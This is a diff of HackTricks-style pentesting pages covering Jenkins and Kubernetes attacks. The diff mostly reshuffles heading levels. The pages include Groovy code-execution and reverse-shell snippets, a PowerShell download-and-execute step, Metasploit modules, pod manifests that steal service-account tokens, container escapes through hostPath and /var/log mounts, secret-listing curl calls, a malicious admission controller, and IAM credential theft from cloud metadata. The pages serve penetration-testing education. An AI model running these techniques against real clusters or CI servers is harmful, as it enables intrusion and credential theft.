{% embed url="https://github.com/gquere/pwn_jenkins" %} {% embed url="https://github.com/gquere/pwn_jenkins" %}
### Dumping builds to find cleartext secrets ## Dumping builds to find cleartext secrets
Use [this script](https://github.com/gquere/pwn\_jenkins/blob/master/dump\_builds/jenkins\_dump\_builds.py) to dump build console outputs and build environment variables to hopefully find cleartext secrets. Use [this script](https://github.com/gquere/pwn\_jenkins/blob/master/dump\_builds/jenkins\_dump\_builds.py) to dump build console outputs and build environment variables to hopefully find cleartext secrets.
### Password spraying ## Password spraying
Use [this python script](https://github.com/gquere/pwn\_jenkins/blob/master/password\_spraying/jenkins\_password\_spraying.py) or [this powershell script](https://github.com/chryzsh/JenkinsPasswordSpray). Use [this python script](https://github.com/gquere/pwn\_jenkins/blob/master/password\_spraying/jenkins\_password\_spraying.py) or [this powershell script](https://github.com/chryzsh/JenkinsPasswordSpray).
### Decrypt Jenkins secrets offline ## Decrypt Jenkins secrets offline
Use [this script](https://github.com/gquere/pwn\_jenkins/blob/master/offline\_decryption/jenkins\_offline\_decrypt.py) to decrypt previsously dumped secrets. Use [this script](https://github.com/gquere/pwn\_jenkins/blob/master/offline\_decryption/jenkins\_offline\_decrypt.py) to decrypt previsously dumped secrets.
### Decrypt Jenkins secrets from Groovy ## Decrypt Jenkins secrets from Groovy
``` ```
println(hudson.util.Secret.decrypt("{...}")) println(hudson.util.Secret.decrypt("{...}"))
``` ```
## Code Execution # Code Execution
### **Create a new project** ## **Create a new project**
This method is very noisy because you have to create a hole new project (obviously this will only work if you user is allowed to create a new project). This method is very noisy because you have to create a hole new project (obviously this will only work if you user is allowed to create a new project).
@ -104,7 +102,7 @@ If you are allowed to configure the project you can **make it execute commands w
Click on **Save** and **build** the project and your **command will be executed**.\ Click on **Save** and **build** the project and your **command will be executed**.\
If you are not executing a reverse shell but a simple command you can **see the output of the command inside the output of the build**. If you are not executing a reverse shell but a simple command you can **see the output of the command inside the output of the build**.
### **Execute Groovy script** ## **Execute Groovy script**
Best way. Less noisy. Best way. Less noisy.
@ -132,7 +130,7 @@ proc.waitForOrKill(1000)
println "out> $sout err> $serr" println "out> $sout err> $serr"
``` ```
### Reverse shell in linux ## Reverse shell in linux
```python ```python
def sout = new StringBuffer(), serr = new StringBuffer() def sout = new StringBuffer(), serr = new StringBuffer()
@ -142,7 +140,7 @@ proc.waitForOrKill(1000)
println "out> $sout err> $serr" println "out> $sout err> $serr"
``` ```
### Reverse shell in windows ## Reverse shell in windows
You can prepare a HTTP server with a PS reverse shell and use Jeking to download and execute it: You can prepare a HTTP server with a PS reverse shell and use Jeking to download and execute it:
@ -152,7 +150,7 @@ echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0
cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc <BASE64> cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc <BASE64>
``` ```
### MSF exploit ## MSF exploit
You can use MSF to get a reverse shell: You can use MSF to get a reverse shell:
@ -160,15 +158,15 @@ You can use MSF to get a reverse shell:
msf> use exploit/multi/http/jenkins_script_console msf> use exploit/multi/http/jenkins_script_console
``` ```
## POST # POST
### Metasploit ## Metasploit
``` ```
msf> post/multi/gather/jenkins_gather msf> post/multi/gather/jenkins_gather
``` ```
### Files to copy after compromission ## Files to copy after compromission
These files are needed to decrypt Jenkins secrets: These files are needed to decrypt Jenkins secrets:
@ -186,7 +184,7 @@ Here's a regexp to find them:
grep -re "^\s*<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<" grep -re "^\s*<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<"
``` ```
## References # References
{% embed url="https://github.com/gquere/pwn_jenkins" %} {% embed url="https://github.com/gquere/pwn_jenkins" %}

View file

@ -17,12 +17,10 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Abusing Roles/ClusterRoles in Kubernetes
Here you can find some potentially dangerous Roles and ClusterRoles configurations.\ Here you can find some potentially dangerous Roles and ClusterRoles configurations.\
Remember that you can get all the supported resources with `kubectl api-resources` Remember that you can get all the supported resources with `kubectl api-resources`
## **Privilege Escalation** # **Privilege Escalation**
Referring as the art of getting **access to a different principal** within the cluster **with different privileges** (within the kubernetes cluster or to external clouds) than the ones you already have, in Kubernetes there are basically **4 main techniques to escalate privileges**: Referring as the art of getting **access to a different principal** within the cluster **with different privileges** (within the kubernetes cluster or to external clouds) than the ones you already have, in Kubernetes there are basically **4 main techniques to escalate privileges**:
@ -32,7 +30,7 @@ Referring as the art of getting **access to a different principal** within the c
* Be able to **escape to the node** from a container, where you can steal all the secrets of the containers running in the node, the credentials of the node, and the permissions of the node within the cloud it's running in (if any) * Be able to **escape to the node** from a container, where you can steal all the secrets of the containers running in the node, the credentials of the node, and the permissions of the node within the cloud it's running in (if any)
* A fifth technique that deserves a mention is the ability to **run port-forward** in a pod, as you may be able to access interesting resources within that pod. * A fifth technique that deserves a mention is the ability to **run port-forward** in a pod, as you may be able to access interesting resources within that pod.
### **Access Any Resource or Verb** ## **Access Any Resource or Verb**
This privilege provides access to **any resource with any verb**. It is the most substantial privilege that a user can get, especially if this privilege is also a “ClusterRole.” If its a “ClusterRole,” than the user can access the resources of any namespace and own the cluster with that permission. This privilege provides access to **any resource with any verb**. It is the most substantial privilege that a user can get, especially if this privilege is also a “ClusterRole.” If its a “ClusterRole,” than the user can access the resources of any namespace and own the cluster with that permission.
@ -48,7 +46,7 @@ rules:
verbs: ["*"] verbs: ["*"]
``` ```
### **Access Any Resource** ## **Access Any Resource**
Giving a user permission to **access any resource can be very risky**. But, **which verbs** allow access to these resources? Here are some dangerous RBAC permissions that can damage the whole cluster: Giving a user permission to **access any resource can be very risky**. But, **which verbs** allow access to these resources? Here are some dangerous RBAC permissions that can damage the whole cluster:
@ -68,7 +66,7 @@ rules:
verbs: ["create", "list", "get"] verbs: ["create", "list", "get"]
``` ```
### Pod Create - Steal Token ## Pod Create - Steal Token
An attacker with permission to create a pod in the “kube-system” namespace can create cryptomining containers for example. Moreover, if there is a **service account with privileged permissions, by running a pod with that service the permissions can be abused to escalate privileges**. An attacker with permission to create a pod in the “kube-system” namespace can create cryptomining containers for example. Moreover, if there is a **service account with privileged permissions, by running a pod with that service the permissions can be abused to escalate privileges**.
@ -105,7 +103,7 @@ So just create the malicious pod and expect the secrets in port 6666:
![](<../../../.gitbook/assets/image (464).png>) ![](<../../../.gitbook/assets/image (464).png>)
### **Pod Create & Escape** ## **Pod Create & Escape**
The following definition gives all the privileges a container can have: The following definition gives all the privileges a container can have:
@ -170,7 +168,7 @@ Now that you can escape to the node check post-exploitation techniques in:
[attacking-kubernetes-from-inside-a-pod.md](../../../pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md) [attacking-kubernetes-from-inside-a-pod.md](../../../pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md)
{% endcontent-ref %} {% endcontent-ref %}
#### Stealth ### Stealth
You probably want to be **stealthier**, in the following pages you can see what you would be able to access if you create a pod only enabling some of the mentioned privileges in the previous template: You probably want to be **stealthier**, in the following pages you can see what you would be able to access if you create a pod only enabling some of the mentioned privileges in the previous template:
@ -183,7 +181,7 @@ You probably want to be **stealthier**, in the following pages you can see what
_You can find example of how to create/abuse the previous privileged pods configurations in_ [_https://github.com/BishopFox/badPods_](https://github.com/BishopFox/badPods)\_\_ _You can find example of how to create/abuse the previous privileged pods configurations in_ [_https://github.com/BishopFox/badPods_](https://github.com/BishopFox/badPods)\_\_
### Pod Create - Move to cloud ## Pod Create - Move to cloud
If you can **create** a **pod** (and optionally a **service account**) you might be able to **obtain privileges in cloud environment** by **assigning cloud roles to a pod or a service account** and then accessing it.\ If you can **create** a **pod** (and optionally a **service account**) you might be able to **obtain privileges in cloud environment** by **assigning cloud roles to a pod or a service account** and then accessing it.\
Moreover, if you can create a **pod with the host network namespace** you can **steal the IAM** role of the **node** instance. Moreover, if you can create a **pod with the host network namespace** you can **steal the IAM** role of the **node** instance.
@ -194,7 +192,7 @@ For more information check:
[kubernetes-access-to-other-clouds.md](../kubernetes-access-to-other-clouds.md) [kubernetes-access-to-other-clouds.md](../kubernetes-access-to-other-clouds.md)
{% endcontent-ref %} {% endcontent-ref %}
### **Create/Patch Deployment, Daemonsets, Statefulsets, Replicationcontrollers, Replicasets, Jobs and Cronjobs** ## **Create/Patch Deployment, Daemonsets, Statefulsets, Replicationcontrollers, Replicasets, Jobs and Cronjobs**
Deployment, Daemonsets, Statefulsets, Replicationcontrollers, Replicasets, Jobs and Cronjobs are all privileges that allow the creation of different tasks in the cluster. Moreover, it's possible can use all of them to **develop pods and even create pods**. So it's possible to a**buse them to escalate privileges just like in the previous example.** Deployment, Daemonsets, Statefulsets, Replicationcontrollers, Replicasets, Jobs and Cronjobs are all privileges that allow the creation of different tasks in the cluster. Moreover, it's possible can use all of them to **develop pods and even create pods**. So it's possible to a**buse them to escalate privileges just like in the previous example.**
@ -233,7 +231,7 @@ Kubernetes API documentation indicates that the “**PodTemplateSpec**” endpoi
**So, the privilege to create or update tasks can also be abused for privilege escalation in the cluster.** **So, the privilege to create or update tasks can also be abused for privilege escalation in the cluster.**
### **Pods Exec** ## **Pods Exec**
**Pod exec** is an option in kubernetes used for **running commands in a shell inside a pod**. This privilege is meant for administrators who want to **access containers and run commands**. Its just like creating a SSH session for the container. **Pod exec** is an option in kubernetes used for **running commands in a shell inside a pod**. This privilege is meant for administrators who want to **access containers and run commands**. Its just like creating a SSH session for the container.
@ -245,7 +243,7 @@ kubectl exec -it <POD_NAME> -n <NAMESPACE> -- sh
Note that as you can get inside any pod, you can abuse other pods token just like in [**Pod Creation exploitation**](./#pod-creation) to try to escalate privileges. Note that as you can get inside any pod, you can abuse other pods token just like in [**Pod Creation exploitation**](./#pod-creation) to try to escalate privileges.
### port-forward ## port-forward
This permission allows to **forward one local port to one port in the specified pod**. This is meant to be able to debug applications running inside a pod easily, but an attacker might abuse it to get access to interesting (like DBs) or vulnerable applications (webs?) inside a pod: This permission allows to **forward one local port to one port in the specified pod**. This is meant to be able to debug applications running inside a pod easily, but an attacker might abuse it to get access to interesting (like DBs) or vulnerable applications (webs?) inside a pod:
@ -253,7 +251,7 @@ This permission allows to **forward one local port to one port in the specified
kubectl port-forward pod/mypod 5000:5000 kubectl port-forward pod/mypod 5000:5000
``` ```
### **Hosts Writable /var/log/ Escape** ## **Hosts Writable /var/log/ Escape**
As [**indicated in this research**](https://jackleadford.github.io/containers/2020/03/06/pvpost.html)\*\*,\*\*If you can access or create a pod with the **hosts `/var/log/` directory mounted** on it, you can **escape from the container**.\ As [**indicated in this research**](https://jackleadford.github.io/containers/2020/03/06/pvpost.html)\*\*,\*\*If you can access or create a pod with the **hosts `/var/log/` directory mounted** on it, you can **escape from the container**.\
This is basically because the when the **Kube-API tries to get the logs** of a container (using `kubectl logs <pod>`), it **requests the `0.log`** file of the pod using the `/logs/` endpoint of the **Kubelet** service.\ This is basically because the when the **Kube-API tries to get the logs** of a container (using `kubectl logs <pod>`), it **requests the `0.log`** file of the pod using the `/logs/` endpoint of the **Kubelet** service.\
@ -287,7 +285,7 @@ curl -k -H 'Authorization: Bearer eyJhbGciOiJSUzI1NiIsImtpZCI6Im[...]' 'https://
**A laboratory and automated exploit can be found in** [**https://blog.aquasec.com/kubernetes-security-pod-escape-log-mounts**](https://blog.aquasec.com/kubernetes-security-pod-escape-log-mounts) **A laboratory and automated exploit can be found in** [**https://blog.aquasec.com/kubernetes-security-pod-escape-log-mounts**](https://blog.aquasec.com/kubernetes-security-pod-escape-log-mounts)
#### Bypassing readOnly protection <a href="#bypassing-hostpath-readonly-protection" id="bypassing-hostpath-readonly-protection"></a> ### Bypassing readOnly protection <a href="#bypassing-hostpath-readonly-protection" id="bypassing-hostpath-readonly-protection"></a>
If you are lucky enough and the highly privileged capability capability `CAP_SYS_ADMIN` is available, you can just remount the folder as rw: If you are lucky enough and the highly privileged capability capability `CAP_SYS_ADMIN` is available, you can just remount the folder as rw:
@ -295,7 +293,7 @@ If you are lucky enough and the highly privileged capability capability `CAP_SYS
mount -o rw,remount /hostlogs/ mount -o rw,remount /hostlogs/
``` ```
#### Bypassing hostPath readOnly protection <a href="#bypassing-hostpath-readonly-protection" id="bypassing-hostpath-readonly-protection"></a> ### Bypassing hostPath readOnly protection <a href="#bypassing-hostpath-readonly-protection" id="bypassing-hostpath-readonly-protection"></a>
As stated in [**this research**](https://jackleadford.github.io/containers/2020/03/06/pvpost.html) its possible to bypass the protection: As stated in [**this research**](https://jackleadford.github.io/containers/2020/03/06/pvpost.html) its possible to bypass the protection:
@ -353,7 +351,7 @@ spec:
name: task-pv-storage-vol name: task-pv-storage-vol
``` ```
### **Impersonating privileged accounts** ## **Impersonating privileged accounts**
With a [**user impersonation**](https://kubernetes.io/docs/reference/access-authn-authz/authentication/#user-impersonation) privilege, an attacker could impersonate a privileged account. With a [**user impersonation**](https://kubernetes.io/docs/reference/access-authn-authz/authentication/#user-impersonation) privilege, an attacker could impersonate a privileged account.
@ -377,7 +375,7 @@ curl -k -v -XGET -H "Authorization: Bearer <JWT TOKEN (of the impersonator)>" \
https://<master_ip>:<port>/api/v1/namespaces/kube-system/secrets/ https://<master_ip>:<port>/api/v1/namespaces/kube-system/secrets/
``` ```
### **Listing Secrets** ## **Listing Secrets**
The **listing secrets privilege** is a strong capability to have in the cluster. A user with the permission to list secrets can **potentially view all the secrets in the cluster including the admin keys**. The secret key is a JWT token encoded in base64. The **listing secrets privilege** is a strong capability to have in the cluster. A user with the permission to list secrets can **potentially view all the secrets in the cluster including the admin keys**. The secret key is a JWT token encoded in base64.
@ -391,7 +389,7 @@ curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1
![](https://www.cyberark.com/wp-content/uploads/2019/08/Kube-Pentest-Fig-2.png) ![](https://www.cyberark.com/wp-content/uploads/2019/08/Kube-Pentest-Fig-2.png)
### **Reading a secret brute-forcing token IDs** ## **Reading a secret brute-forcing token IDs**
An attacker that found a token with permission to read a secret cant use this permission without knowing the full secrets name. This permission is different from the _**listing** **secrets**_ permission described above. An attacker that found a token with permission to read a secret cant use this permission without knowing the full secrets name. This permission is different from the _**listing** **secrets**_ permission described above.
@ -419,7 +417,7 @@ This means that there are 275 = 14,348,907 possibilities for a token.
An attacker can run a brute-force attack to guess the token ID in couple of hours. Succeeding to get secrets from default sensitive service accounts will allow him to escalate privileges. An attacker can run a brute-force attack to guess the token ID in couple of hours. Succeeding to get secrets from default sensitive service accounts will allow him to escalate privileges.
## Built-in Privileged Escalation Prevention # Built-in Privileged Escalation Prevention
Although there can be risky permissions, Kubernetes is doing good work preventing other types of permissions with potential for privileged escalation. Although there can be risky permissions, Kubernetes is doing good work preventing other types of permissions with potential for privileged escalation.
@ -445,7 +443,7 @@ After trying to do so, we will receive an error “forbidden: attempt to grant e
![](https://www.cyberark.com/wp-content/uploads/2018/12/forbidden\_attempt\_to\_gran\_extra\_privileges\_message-1024x288.png) ![](https://www.cyberark.com/wp-content/uploads/2018/12/forbidden\_attempt\_to\_gran\_extra\_privileges\_message-1024x288.png)
### **Get & Patch RoleBindings/ClusterRoleBindings** ## **Get & Patch RoleBindings/ClusterRoleBindings**
{% hint style="danger" %} {% hint style="danger" %}
**Apparently this technique worked before, but according to my tests it's not working anymore for the same reason explained in the previous section. Yo cannot create/modify a rolebinding to give yourself or a different SA some privileges if you don't have already.** **Apparently this technique worked before, but according to my tests it's not working anymore for the same reason explained in the previous section. Yo cannot create/modify a rolebinding to give yourself or a different SA some privileges if you don't have already.**
@ -501,13 +499,13 @@ curl -k -v -X POST -H "Authorization: Bearer <COMPROMISED JWT TOKEN>"\
https://<master_ip>:<port>/api/v1/namespaces/kube-system/secret https://<master_ip>:<port>/api/v1/namespaces/kube-system/secret
``` ```
## Other Attacks # Other Attacks
### S**idecar proxy app** ## S**idecar proxy app**
By default there isn't any encryption in the communication between pods .Mutual authentication, two-way, pod to pod. By default there isn't any encryption in the communication between pods .Mutual authentication, two-way, pod to pod.
#### Create a sidecar proxy app <a href="#create-a-sidecar-proxy-app" id="create-a-sidecar-proxy-app"></a> ### Create a sidecar proxy app <a href="#create-a-sidecar-proxy-app" id="create-a-sidecar-proxy-app"></a>
Create your .yaml Create your .yaml
@ -552,7 +550,7 @@ kubectl logs app -C proxy
More info at: [https://kubernetes.io/docs/tasks/configure-pod-container/security-context/](https://kubernetes.io/docs/tasks/configure-pod-container/security-context/) More info at: [https://kubernetes.io/docs/tasks/configure-pod-container/security-context/](https://kubernetes.io/docs/tasks/configure-pod-container/security-context/)
### Malicious Admission Controller ## Malicious Admission Controller
An admission controller is a piece of code that **intercepts requests to the Kubernetes API server** before the persistence of the object, but **after the request is authenticated** **and authorized**. An admission controller is a piece of code that **intercepts requests to the Kubernetes API server** before the persistence of the object, but **after the request is authenticated** **and authorized**.
@ -596,7 +594,7 @@ kubectl describe po nginx | grep "Image: "
As you can see in the above image, we tried running image `nginx` but the final executed image is `rewanthtammana/malicious-image`. What just happened!!? As you can see in the above image, we tried running image `nginx` but the final executed image is `rewanthtammana/malicious-image`. What just happened!!?
#### Technicalities <a href="#heading-technicalities" id="heading-technicalities"></a> ### Technicalities <a href="#heading-technicalities" id="heading-technicalities"></a>
We will unfold what just happened. The `./deploy.sh` script that you executed, created a mutating webhook admission controller. The below lines in the mutating webhook admission controller are responsible for the above results. We will unfold what just happened. The `./deploy.sh` script that you executed, created a mutating webhook admission controller. The below lines in the mutating webhook admission controller are responsible for the above results.
@ -610,9 +608,9 @@ patches = append(patches, patchOperation{
The above snippet replaces the first container image in every pod with `rewanthtammana/malicious-image`. The above snippet replaces the first container image in every pod with `rewanthtammana/malicious-image`.
## Best Practices # Best Practices
### **Prevent service account token automounting on pods** ## **Prevent service account token automounting on pods**
When a pod is being created, it automatically mounts a service account (the default is default service account in the same namespace). Not every pod needs the ability to utilize the API from within itself. When a pod is being created, it automatically mounts a service account (the default is default service account in the same namespace). Not every pod needs the ability to utilize the API from within itself.
@ -626,15 +624,15 @@ It is also possible to use it on the pod:\\
![](https://www.cyberark.com/wp-content/uploads/2018/12/pod\_with\_autoamountServiceAccountToken\_false.png) ![](https://www.cyberark.com/wp-content/uploads/2018/12/pod\_with\_autoamountServiceAccountToken\_false.png)
### **Grant specific users to RoleBindings\ClusterRoleBindings** ## **Grant specific users to RoleBindings\ClusterRoleBindings**
When creating RoleBindings\ClusterRoleBindings, make sure that only the users that need the role in the binding are inside. It is easy to forget users that are not relevant anymore inside such groups. When creating RoleBindings\ClusterRoleBindings, make sure that only the users that need the role in the binding are inside. It is easy to forget users that are not relevant anymore inside such groups.
### **Use Roles and RoleBindings instead of ClusterRoles and ClusterRoleBindings** ## **Use Roles and RoleBindings instead of ClusterRoles and ClusterRoleBindings**
When using ClusterRoles and ClusterRoleBindings, it applies on the whole cluster. A user in such a group has its permissions over all the namespaces, which is sometimes unnecessary. Roles and RoleBindings can be applied on a specific namespace and provide another layer of security. When using ClusterRoles and ClusterRoleBindings, it applies on the whole cluster. A user in such a group has its permissions over all the namespaces, which is sometimes unnecessary. Roles and RoleBindings can be applied on a specific namespace and provide another layer of security.
### **Use automated tools** ## **Use automated tools**
{% embed url="https://github.com/cyberark/KubiScan" %} {% embed url="https://github.com/cyberark/KubiScan" %}
@ -642,7 +640,7 @@ When using ClusterRoles and ClusterRoleBindings, it applies on the whole cluster
{% embed url="https://github.com/aquasecurity/kube-bench" %} {% embed url="https://github.com/aquasecurity/kube-bench" %}
## **References** # **References**
{% embed url="https://www.cyberark.com/resources/threat-research-blog/securing-kubernetes-clusters-by-eliminating-risky-permissions" %} {% embed url="https://www.cyberark.com/resources/threat-research-blog/securing-kubernetes-clusters-by-eliminating-risky-permissions" %}

View file

@ -17,11 +17,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# K8s Roles Abuse Lab
You can run these labs just inside **minikube**. You can run these labs just inside **minikube**.
## Pod Creation -> Escalate to ns SAs # Pod Creation -> Escalate to ns SAs
We are going to create: We are going to create:
@ -128,7 +126,7 @@ kubectl delete role test-r
kubectl delete serviceaccount test-sa kubectl delete serviceaccount test-sa
``` ```
## Create Daemonset # Create Daemonset
```bash ```bash
# Create Service Account test-sa # Create Service Account test-sa
@ -226,7 +224,7 @@ kubectl delete role test-r
kubectl delete serviceaccount test-sa kubectl delete serviceaccount test-sa
``` ```
### Patch Daemonset ## Patch Daemonset
In this case we are going to **patch a daemonset** to make its pod load our desired service account. In this case we are going to **patch a daemonset** to make its pod load our desired service account.
@ -347,9 +345,9 @@ kubectl delete role test-r
kubectl delete serviceaccount test-sa kubectl delete serviceaccount test-sa
``` ```
## Doesn't work # Doesn't work
### Create/Patch Bindings ## Create/Patch Bindings
**Doesn't work:** **Doesn't work:**
@ -439,7 +437,7 @@ kubectl delete serviceaccount test-sa
kubectl delete serviceaccount test-sa2 kubectl delete serviceaccount test-sa2
``` ```
### Bind explicitly Bindings ## Bind explicitly Bindings
In the "Privilege Escalation Prevention and Bootstrapping" section of [https://unofficial-kubernetes.readthedocs.io/en/latest/admin/authorization/rbac/](https://unofficial-kubernetes.readthedocs.io/en/latest/admin/authorization/rbac/) it's mentioned that if a SA can create a Binding and has explicitly Bind permissions over the Role/Cluster role, it can create bindings even using Roles/ClusterRoles with permissions that it doesn't have.\ In the "Privilege Escalation Prevention and Bootstrapping" section of [https://unofficial-kubernetes.readthedocs.io/en/latest/admin/authorization/rbac/](https://unofficial-kubernetes.readthedocs.io/en/latest/admin/authorization/rbac/) it's mentioned that if a SA can create a Binding and has explicitly Bind permissions over the Role/Cluster role, it can create bindings even using Roles/ClusterRoles with permissions that it doesn't have.\
However, it didn't work for me: However, it didn't work for me:
@ -576,7 +574,7 @@ kubectl delete serviceaccount test-sa
kubectl delete serviceaccount test-sa2 kubectl delete serviceaccount test-sa2
``` ```
### Arbitrary roles creation ## Arbitrary roles creation
In this example we try to create a role having the permissions create and path over the roles resources. However, K8s prevent us from creating a role with more permissions the principal creating is has: In this example we try to create a role having the permissions create and path over the roles resources. However, K8s prevent us from creating a role with more permissions the principal creating is has:
@ -610,7 +608,7 @@ roleRef:
' | kubectl apply -f - ' | kubectl apply -f -
# Try to create a role over all the resources with "create" and "patch" # Try to create a role over all the resources with "create" and "patch"
## This won't wotrk # This won't wotrk
echo 'kind: Role echo 'kind: Role
apiVersion: rbac.authorization.k8s.io/v1 apiVersion: rbac.authorization.k8s.io/v1
metadata: metadata:

View file

@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Pod Escape Privileges # Privileged and hostPID
## Privileged and hostPID
With these privileges you will have **access to the hosts processes** and **enough privileges to enter inside the namespace of one of the host processes**.\ With these privileges you will have **access to the hosts processes** and **enough privileges to enter inside the namespace of one of the host processes**.\
Note that you can potentially not need privileged but just some capabilities and other potential defenses bypasses (like apparmor and/or seccomp). Note that you can potentially not need privileged but just some capabilities and other potential defenses bypasses (like apparmor and/or seccomp).
@ -51,7 +49,7 @@ spec:
#nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
``` ```
## Privileged only # Privileged only

View file

@ -17,13 +17,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Kubernetes Access to other Clouds # GCP
## GCP
If you are running a k8s cluster inside GCP you will probably want that some application running inside the cluster has some access to GCP. There are 2 common ways of doing that: If you are running a k8s cluster inside GCP you will probably want that some application running inside the cluster has some access to GCP. There are 2 common ways of doing that:
### Mounting GCP-SA keys as secret ## Mounting GCP-SA keys as secret
A common way to give **access to a kubernetes application to GCP** is to: A common way to give **access to a kubernetes application to GCP** is to:
@ -37,7 +35,7 @@ A common way to give **access to a kubernetes application to GCP** is to:
Therefore, as an **attacker**, if you compromise a container inside a pod, you should check for that **env** **variable** and **json** **files** with GCP credentials. Therefore, as an **attacker**, if you compromise a container inside a pod, you should check for that **env** **variable** and **json** **files** with GCP credentials.
{% endhint %} {% endhint %}
### GKE Workload Identity ## GKE Workload Identity
With Workload Identity, we can configure a[ Kubernetes service account](https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/) to act as a[ Google service account](https://cloud.google.com/iam/docs/understanding-service-accounts). Pods running with the Kubernetes service account will automatically authenticate as the Google service account when accessing Google Cloud APIs. With Workload Identity, we can configure a[ Kubernetes service account](https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/) to act as a[ Google service account](https://cloud.google.com/iam/docs/understanding-service-accounts). Pods running with the Kubernetes service account will automatically authenticate as the Google service account when accessing Google Cloud APIs.
@ -87,9 +85,9 @@ for ns in `kubectl get namespaces -o custom-columns=NAME:.metadata.name | grep -
done | grep -B 1 "gcp-service-account" done | grep -B 1 "gcp-service-account"
``` ```
## AWS # AWS
### Kiam & Kube2IAM (IAM role for Pods) <a href="#workflow-of-iam-role-for-service-accounts" id="workflow-of-iam-role-for-service-accounts"></a> ## Kiam & Kube2IAM (IAM role for Pods) <a href="#workflow-of-iam-role-for-service-accounts" id="workflow-of-iam-role-for-service-accounts"></a>
An (outdated) way to give IAM Roles to Pods is to use a [**Kiam**](https://github.com/uswitch/kiam) or a [**Kube2IAM**](https://github.com/jtblin/kube2iam) **server.** Basically you will need to run a **daemonset** in your cluster with a **kind of privileged IAM role**. This daemonset will be the one that will give access to IAM roles to the pods that need it. An (outdated) way to give IAM Roles to Pods is to use a [**Kiam**](https://github.com/uswitch/kiam) or a [**Kube2IAM**](https://github.com/jtblin/kube2iam) **server.** Basically you will need to run a **daemonset** in your cluster with a **kind of privileged IAM role**. This daemonset will be the one that will give access to IAM roles to the pods that need it.
@ -134,7 +132,7 @@ metadata:
As an attacker, if you **find these annotations** in pods or namespaces or a kiam/kube2iam server running (in kube-system probably) you can **impersonate every r**ole that is already **used by pods** and more (if you have access to AWS account enumerate the roles). As an attacker, if you **find these annotations** in pods or namespaces or a kiam/kube2iam server running (in kube-system probably) you can **impersonate every r**ole that is already **used by pods** and more (if you have access to AWS account enumerate the roles).
{% endhint %} {% endhint %}
#### Create Pod with IAM Role ### Create Pod with IAM Role
{% hint style="info" %} {% hint style="info" %}
The IAM role to indicate must be in the same AWS account as the kiam/kube2iam role and that role must be able to access it. The IAM role to indicate must be in the same AWS account as the kiam/kube2iam role and that role must be able to access it.
@ -156,7 +154,7 @@ spec:
args: ["-c", "sleep 100000"]' | kubectl apply -f - args: ["-c", "sleep 100000"]' | kubectl apply -f -
``` ```
### Workflow of IAM role for Service Accounts via OIDC <a href="#workflow-of-iam-role-for-service-accounts" id="workflow-of-iam-role-for-service-accounts"></a> ## Workflow of IAM role for Service Accounts via OIDC <a href="#workflow-of-iam-role-for-service-accounts" id="workflow-of-iam-role-for-service-accounts"></a>
This is the recommended way by AWS. This is the recommended way by AWS.
@ -183,7 +181,7 @@ Moreover, if you are inside a pod, check for env variables like **AWS\_ROLE\_ARN
{% endhint %} {% endhint %}
### Find Pods a SAs with IAM Roles in the Cluster ## Find Pods a SAs with IAM Roles in the Cluster
This is a script to easily **iterate over the all the pods and sas** definitions **looking** for that **annotation**: This is a script to easily **iterate over the all the pods and sas** definitions **looking** for that **annotation**:
@ -204,7 +202,7 @@ for ns in `kubectl get namespaces -o custom-columns=NAME:.metadata.name | grep -
done | grep -B 1 "amazonaws.com" done | grep -B 1 "amazonaws.com"
``` ```
### Node IAM Role ## Node IAM Role
The previos section was about how to steal IAM Roles with pods, but note that a **Node of the** K8s cluster is going to be an **instance inside the cloud**. This means that the Node is highly probable going to **have a new IAM role you can steal** (_note that usually all the nodes of a K8s cluster will have the same IAM role, so it might not be worth it to try to check on each node_). The previos section was about how to steal IAM Roles with pods, but note that a **Node of the** K8s cluster is going to be an **instance inside the cloud**. This means that the Node is highly probable going to **have a new IAM role you can steal** (_note that usually all the nodes of a K8s cluster will have the same IAM role, so it might not be worth it to try to check on each node_).
@ -214,7 +212,7 @@ There is however an important requirement to access the metadata endpoint from t
kubectl run NodeIAMStealer --restart=Never -ti --rm --image lol --overrides '{"spec":{"hostNetwork": true, "containers":[{"name":"1","image":"alpine","stdin": true,"tty":true,"imagePullPolicy":"IfNotPresent"}]}}' kubectl run NodeIAMStealer --restart=Never -ti --rm --image lol --overrides '{"spec":{"hostNetwork": true, "containers":[{"name":"1","image":"alpine","stdin": true,"tty":true,"imagePullPolicy":"IfNotPresent"}]}}'
``` ```
### Steal IAM Role Token ## Steal IAM Role Token
Previously we have discussed how to **attach IAM Roles to Pods** or even how to **escape to the Node to steal the IAM Role** the instance has attached to it. Previously we have discussed how to **attach IAM Roles to Pods** or even how to **escape to the Node to steal the IAM Role** the instance has attached to it.
@ -231,7 +229,7 @@ if [ "$IAM_ROLE_NAME" ]; then
fi fi
``` ```
## References # References
* [https://medium.com/zeotap-customer-intelligence-unleashed/gke-workload-identity-a-secure-way-for-gke-applications-to-access-gcp-services-f880f4e74e8c](https://medium.com/zeotap-customer-intelligence-unleashed/gke-workload-identity-a-secure-way-for-gke-applications-to-access-gcp-services-f880f4e74e8c) * [https://medium.com/zeotap-customer-intelligence-unleashed/gke-workload-identity-a-secure-way-for-gke-applications-to-access-gcp-services-f880f4e74e8c](https://medium.com/zeotap-customer-intelligence-unleashed/gke-workload-identity-a-secure-way-for-gke-applications-to-access-gcp-services-f880f4e74e8c)
* [https://blogs.halodoc.io/iam-roles-for-service-accounts-2/](https://blogs.halodoc.io/iam-roles-for-service-accounts-2/) * [https://blogs.halodoc.io/iam-roles-for-service-accounts-2/](https://blogs.halodoc.io/iam-roles-for-service-accounts-2/)

